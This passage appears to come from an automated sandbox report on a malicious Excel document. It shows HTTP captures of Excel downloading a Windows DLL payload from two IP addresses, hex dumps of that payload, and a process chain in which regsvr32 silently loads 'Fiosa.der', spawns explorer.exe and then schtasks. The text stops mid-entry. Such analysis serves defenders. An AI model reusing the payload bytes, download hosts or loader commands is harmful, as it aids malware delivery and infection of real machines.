      Sep 24, 2021 15:59:28.861428022 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:28.861438990 CEST4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:28.861450911 CEST6INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:28.861462116 CEST7INData Raw: 3b f0 74 1c 00 9f c8 5d 07 10 8b c6 2b c3 03 c8 8b c1 2b c3 83 ef 02 83 ff 02 8d 74 06 50 7f d9 0f b6 05 d5 5d 07 10 8b d9 0f af de 0f b6 35 cd 5d 07 10 69 db 93 6c 01 00 8d 3c 30 81 ff c4 00 00 00 a0 78 5d 07 10 89 0d d8 5d 07 10 75 1e 0f b6 f0
      Data Ascii: ;t]++tP]5]il<0x]]u+fl$+a]*T$U]]PIu++a]*T$U]]5]+U;wT]];va-t]+
      Sep 24, 2021 15:59:28.861474991 CEST8INData Raw: 07 10 80 c2 55 00 15 d7 5d 07 10 83 c3 50 81 7c 24 24 c4 00 00 00 75 1d 8b 15 c4 5d 07 10 03 d2 8b f2 2b 35 74 5d 07 10 2b f1 83 c6 61 89 35 74 5d 07 10 eb 23 0f b6 05 74 5d 07 10 8b 35 74 5d 07 10 2a c1 04 55 00 05 d7 5d 07 10 83 05 c4 5d 07 10
      Data Ascii: U]P|$$u]+5t]+a5t]#t]5t]*U]]Px]9]r]5t]*(]x]T$(s+T$(T$f|$]+v 5]u]*]*x]ax]];wT]]
      Sep 24, 2021 15:59:28.861483097 CEST8INData Raw: 07 10 2a d3 80 c2 61 83 c4 04 a3 d8 5d 07 10 88 15 78 5d 07 10 84 28 0b 67 8b 35 c4 5d 07 10 66 0f b6 3d d2 5d 07 10 8b cb 2b ce 83 c1 03 0f b7 c9 66 3b f9 89 4c 24 10 77 0c 0f b7 c9 a2 cc 5d 07 10 8d 5c 01 0a 8d 8c 1e bd 3f 00 00 0f b7 c9 89 4c
      Data Ascii: *a]x](g5]f=]+f;L$w]\?L$f$=];t%]++\Px]]]=
      Sep 24, 2021 15:59:28.861494064 CEST10INData Raw: 5d 07 10 3b c7 74 27 0f b6 86 c8 5d 07 10 2b d8 0f b7 fd 8b c3 2b c7 0f b6 f9 83 c0 61 3b c7 a3 d8 5d 07 10 74 08 83 c6 01 83 fe 32 7c ce 5f 5e 5d 0f b6 c2 5b 83 c4 20 c3 cc cc cc 53 55 8b 6c 24 0c 56 8b f0 8b 4e 18 83 f9 08 8d 5e 04 72 04 8b 03
      Data Ascii: ];t']++a;]t2|_^][ SUl$VN^r=iw7rVP=ivri+QV^][F+;v(;swvMW~_t;FrNU+hiPJR1~~r
      Sep 24, 2021 15:59:28.861505032 CEST11INData Raw: 66 c7 04 58 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 18 08 72 0c 8b 56 04 52 e8 ae 09 00 00 83 c4 04 33 c0 50 c7 46 18 07 00 00 00 89 46 14 50 66 89 46 04 e8 cc 0d 00 00 cc cc cc cc cc cc cc cc cc cc cc cc
      Data Ascii: fXMdY_^[]u~rVR3PFFPfFw3RT3s$PL$D$hh8L$QD$oD$VP^% %%%$Uuuuu
      Sep 24, 2021 15:59:28.861516953 CEST13INData Raw: 0b ff 71 14 56 e8 bd fc ff ff eb 29 80 7c 24 0c 00 74 18 83 fe 10 73 13 8b 41 14 3b f0 73 02 8b c6 50 6a 01 e8 53 fc ff ff eb 0a 85 f6 75 06 56 e8 2b fc ff ff 33 c0 3b c6 1b c0 f7 d8 5e c2 08 00 56 ff 74 24 08 8b f1 e8 a1 fe ff ff c7 06 c4 a1 02
      Data Ascii: qV)|$tsA;sPjSuV+3;^Vt$^US]VW}G;s+EE;EsE;uEjPSjFjuCt8rNrFFuWQPuz_^[]UV
      Sep 24, 2021 15:59:29.068849087 CEST14INData Raw: 01 74 07 56 e8 5d ff ff ff 59 8b c6 5e c2 04 00 8b 44 24 04 83 c1 09 51 83 c0 09 50 e8 6d 14 00 00 f7 d8 59 1b c0 59 40 c2 04 00 56 6a 01 68 8c 50 07 10 8b f1 e8 f5 fc ff ff c7 06 a0 a1 02 10 8b c6 5e c3 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 f6 15
      Data Ascii: tV]Y^D$QPmYY@VjhP^UuYtunYtL^@^uL^h!YVMhh8EPEUQESVWWjPu3V>LVj


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249168111.90.148.10480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 24, 2021 15:59:31.410495043 CEST519OUTGET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 111.90.148.104
      Connection: Keep-Alive
      Sep 24, 2021 15:59:32.366945982 CEST520INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:32 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B
      Sep 24, 2021 15:59:32.367264986 CEST522INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:32.367311001 CEST523INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:32.367348909 CEST525INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:32.367386103 CEST526INData Raw: 3b f0 74 1c 00 9f c8 5d 07 10 8b c6 2b c3 03 c8 8b c1 2b c3 83 ef 02 83 ff 02 8d 74 06 50 7f d9 0f b6 05 d5 5d 07 10 8b d9 0f af de 0f b6 35 cd 5d 07 10 69 db 93 6c 01 00 8d 3c 30 81 ff c4 00 00 00 a0 78 5d 07 10 89 0d d8 5d 07 10 75 1e 0f b6 f0
      Data Ascii: ;t]++tP]5]il<0x]]u+fl$+a]*T$U]]PIu++a]*T$U]]5]+U;wT]];va-t]+
      Sep 24, 2021 15:59:32.367434978 CEST527INData Raw: 07 10 80 c2 55 00 15 d7 5d 07 10 83 c3 50 81 7c 24 24 c4 00 00 00 75 1d 8b 15 c4 5d 07 10 03 d2 8b f2 2b 35 74 5d 07 10 2b f1 83 c6 61 89 35 74 5d 07 10 eb 23 0f b6 05 74 5d 07 10 8b 35 74 5d 07 10 2a c1 04 55 00 05 d7 5d 07 10 83 05 c4 5d 07 10
      Data Ascii: U]P|$$u]+5t]+a5t]#t]5t]*U]]Px]9]r]5t]*(]x]T$(s+T$(T$f|$]+v 5]u]*]*x]ax]];wT]]
      Sep 24, 2021 15:59:32.367469072 CEST528INData Raw: 07 10 2a d3 80 c2 61 83 c4 04 a3 d8 5d 07 10 88 15 78 5d 07 10 84 28 0b 67 8b 35 c4 5d 07 10 66 0f b6 3d d2 5d 07 10 8b cb 2b ce 83 c1 03 0f b7 c9 66 3b f9 89 4c 24 10 77 0c 0f b7 c9 a2 cc 5d 07 10 8d 5c 01 0a 8d 8c 1e bd 3f 00 00 0f b7 c9 89 4c
      Data Ascii: *a]x](g5]f=]+f;L$w]\?L$f$=];t%]++\Px]]]=
      Sep 24, 2021 15:59:32.367506027 CEST529INData Raw: 5d 07 10 3b c7 74 27 0f b6 86 c8 5d 07 10 2b d8 0f b7 fd 8b c3 2b c7 0f b6 f9 83 c0 61 3b c7 a3 d8 5d 07 10 74 08 83 c6 01 83 fe 32 7c ce 5f 5e 5d 0f b6 c2 5b 83 c4 20 c3 cc cc cc 53 55 8b 6c 24 0c 56 8b f0 8b 4e 18 83 f9 08 8d 5e 04 72 04 8b 03
      Data Ascii: ];t']++a;]t2|_^][ SUl$VN^r=iw7rVP=ivri+QV^][F+;v(;swvMW~_t;FrNU+hiPJR1~~r
      Sep 24, 2021 15:59:32.367546082 CEST530INData Raw: 66 c7 04 58 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 18 08 72 0c 8b 56 04 52 e8 ae 09 00 00 83 c4 04 33 c0 50 c7 46 18 07 00 00 00 89 46 14 50 66 89 46 04 e8 cc 0d 00 00 cc cc cc cc cc cc cc cc cc cc cc cc
      Data Ascii: fXMdY_^[]u~rVR3PFFPfFw3RT3s$PL$D$hh8L$QD$oD$VP^% %%%$Uuuuu
      Sep 24, 2021 15:59:32.551439047 CEST532INData Raw: 0b ff 71 14 56 e8 bd fc ff ff eb 29 80 7c 24 0c 00 74 18 83 fe 10 73 13 8b 41 14 3b f0 73 02 8b c6 50 6a 01 e8 53 fc ff ff eb 0a 85 f6 75 06 56 e8 2b fc ff ff 33 c0 3b c6 1b c0 f7 d8 5e c2 08 00 56 ff 74 24 08 8b f1 e8 a1 fe ff ff c7 06 c4 a1 02
      Data Ascii: qV)|$tsA;sPjSuV+3;^Vt$^US]VW}G;s+EE;EsE;uEjPSjFjuCt8rNrFFuWQPuz_^[]UV
      Sep 24, 2021 15:59:32.584152937 CEST533INData Raw: 01 74 07 56 e8 5d ff ff ff 59 8b c6 5e c2 04 00 8b 44 24 04 83 c1 09 51 83 c0 09 50 e8 6d 14 00 00 f7 d8 59 1b c0 59 40 c2 04 00 56 6a 01 68 8c 50 07 10 8b f1 e8 f5 fc ff ff c7 06 a0 a1 02 10 8b c6 5e c3 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 f6 15
      Data Ascii: tV]Y^D$QPmYY@VjhP^UuYtunYtL^@^uL^h!YVMhh8EPEUQESVWWjPu3V>LVj


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.224916951.89.115.11180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 24, 2021 15:59:49.888041019 CEST1040OUTGET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 51.89.115.111
      Connection: Keep-Alive
      Sep 24, 2021 15:59:50.080285072 CEST1042INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:50 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B
      Sep 24, 2021 15:59:50.080348969 CEST1043INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:50.080388069 CEST1044INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:50.080427885 CEST1046INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Sep 24, 2021 15:59:50.080475092 CEST1047INData Raw: 3b f0 74 1c 00 9f c8 5d 07 10 8b c6 2b c3 03 c8 8b c1 2b c3 83 ef 02 83 ff 02 8d 74 06 50 7f d9 0f b6 05 d5 5d 07 10 8b d9 0f af de 0f b6 35 cd 5d 07 10 69 db 93 6c 01 00 8d 3c 30 81 ff c4 00 00 00 a0 78 5d 07 10 89 0d d8 5d 07 10 75 1e 0f b6 f0
      Data Ascii: ;t]++tP]5]il<0x]]u+fl$+a]*T$U]]PIu++a]*T$U]]5]+U;wT]];va-t]+
      Sep 24, 2021 15:59:50.080518007 CEST1048INData Raw: 07 10 80 c2 55 00 15 d7 5d 07 10 83 c3 50 81 7c 24 24 c4 00 00 00 75 1d 8b 15 c4 5d 07 10 03 d2 8b f2 2b 35 74 5d 07 10 2b f1 83 c6 61 89 35 74 5d 07 10 eb 23 0f b6 05 74 5d 07 10 8b 35 74 5d 07 10 2a c1 04 55 00 05 d7 5d 07 10 83 05 c4 5d 07 10
      Data Ascii: U]P|$$u]+5t]+a5t]#t]5t]*U]]Px]9]r]5t]*(]x]T$(s+T$(T$f|$]+v 5]u]*]*x]ax]];wT]]
      Sep 24, 2021 15:59:50.080547094 CEST1049INData Raw: 07 10 2a d3 80 c2 61 83 c4 04 a3 d8 5d 07 10 88 15 78 5d 07 10 84 28 0b 67 8b 35 c4 5d 07 10 66 0f b6 3d d2 5d 07 10 8b cb 2b ce 83 c1 03 0f b7 c9 66 3b f9 89 4c 24 10 77 0c 0f b7 c9 a2 cc 5d 07 10 8d 5c 01 0a 8d 8c 1e bd 3f 00 00 0f b7 c9 89 4c
      Data Ascii: *a]x](g5]f=]+f;L$w]\?L$f$=];t%]++\Px]]]=
      Sep 24, 2021 15:59:50.080586910 CEST1050INData Raw: 5d 07 10 3b c7 74 27 0f b6 86 c8 5d 07 10 2b d8 0f b7 fd 8b c3 2b c7 0f b6 f9 83 c0 61 3b c7 a3 d8 5d 07 10 74 08 83 c6 01 83 fe 32 7c ce 5f 5e 5d 0f b6 c2 5b 83 c4 20 c3 cc cc cc 53 55 8b 6c 24 0c 56 8b f0 8b 4e 18 83 f9 08 8d 5e 04 72 04 8b 03
      Data Ascii: ];t']++a;]t2|_^][ SUl$VN^r=iw7rVP=ivri+QV^][F+;v(;swvMW~_t;FrNU+hiPJR1~~r
      Sep 24, 2021 15:59:50.080626011 CEST1052INData Raw: 66 c7 04 58 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 18 08 72 0c 8b 56 04 52 e8 ae 09 00 00 83 c4 04 33 c0 50 c7 46 18 07 00 00 00 89 46 14 50 66 89 46 04 e8 cc 0d 00 00 cc cc cc cc cc cc cc cc cc cc cc cc
      Data Ascii: fXMdY_^[]u~rVR3PFFPfFw3RT3s$PL$D$hh8L$QD$oD$VP^% %%%$Uuuuu
      Sep 24, 2021 15:59:50.099647045 CEST1053INData Raw: 0b ff 71 14 56 e8 bd fc ff ff eb 29 80 7c 24 0c 00 74 18 83 fe 10 73 13 8b 41 14 3b f0 73 02 8b c6 50 6a 01 e8 53 fc ff ff eb 0a 85 f6 75 06 56 e8 2b fc ff ff 33 c0 3b c6 1b c0 f7 d8 5e c2 08 00 56 ff 74 24 08 8b f1 e8 a1 fe ff ff c7 06 c4 a1 02
      Data Ascii: qV)|$tsA;sPjSuV+3;^Vt$^US]VW}G;s+EE;EsE;uEjPSjFjuCt8rNrFFuWQPuz_^[]UV
      Sep 24, 2021 15:59:50.099705935 CEST1055INData Raw: 01 74 07 56 e8 5d ff ff ff 59 8b c6 5e c2 04 00 8b 44 24 04 83 c1 09 51 83 c0 09 50 e8 6d 14 00 00 f7 d8 59 1b c0 59 40 c2 04 00 56 6a 01 68 8c 50 07 10 8b f1 e8 f5 fc ff ff c7 06 a0 a1 02 10 8b c6 5e c3 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 f6 15
      Data Ascii: tV]Y^D$QPmYY@VjhP^UuYtunYtL^@^uL^h!YVMhh8EPEUQESVWWjPu3V>LVj


      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 1180 Parent PID: 596

      General

      Start time:16:00:15
      Start date:24/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f6d0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 1912 Parent PID: 1180

      General

      Start time:16:00:42
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 1760 Parent PID: 1912

      General

      Start time:16:00:42
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa.der
      Imagebase:0x5d0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Chronological Activities

      Analysis Process: explorer.exe PID: 2520 Parent PID: 1760

      General

      Start time:16:01:09
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 2428 Parent PID: 1180

      General

      Start time:16:01:10
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa1.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: schtasks.exe PID: 2604 Parent PID: 2520

      General

      Start time:16:01:11
      Start date:24/09/2021
